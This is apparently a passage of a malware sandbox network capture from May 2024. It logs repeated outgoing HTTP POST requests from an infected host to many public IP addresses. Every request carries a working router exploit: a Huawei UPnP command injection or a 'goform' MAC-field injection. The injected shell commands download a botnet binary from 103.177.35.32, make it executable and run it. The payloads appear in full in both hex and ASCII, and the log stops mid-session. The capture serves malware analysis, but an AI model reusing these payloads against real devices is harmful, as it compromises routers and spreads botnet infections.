                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3270192.168.2.2334174197.50.222.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.684238911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3271192.168.2.2349458157.0.93.17137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.684303045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3272192.168.2.234402881.36.196.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535393953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3273192.168.2.2347490150.200.184.1528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535445929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3274192.168.2.2338526186.33.191.1648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535455942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3275192.168.2.234508851.40.65.1478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535480976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3276192.168.2.234403437.219.145.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535501957 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3277192.168.2.2339748110.45.145.1828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535521030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3278192.168.2.234779283.58.96.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535538912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3279192.168.2.2333880209.209.203.78080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535557032 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3280192.168.2.2345620200.232.117.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535581112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3281192.168.2.233385639.141.54.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535609007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3282192.168.2.2337150175.53.148.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.535620928 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3283192.168.2.2353292177.117.151.108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.539800882 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3284192.168.2.236074693.91.79.1888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.539800882 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3285192.168.2.235364870.249.250.668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.539835930 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3286192.168.2.2359104170.177.236.2528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.539901018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3287192.168.2.2360894186.1.10.48080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540004969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3288192.168.2.235154082.234.69.768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:17.540034056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
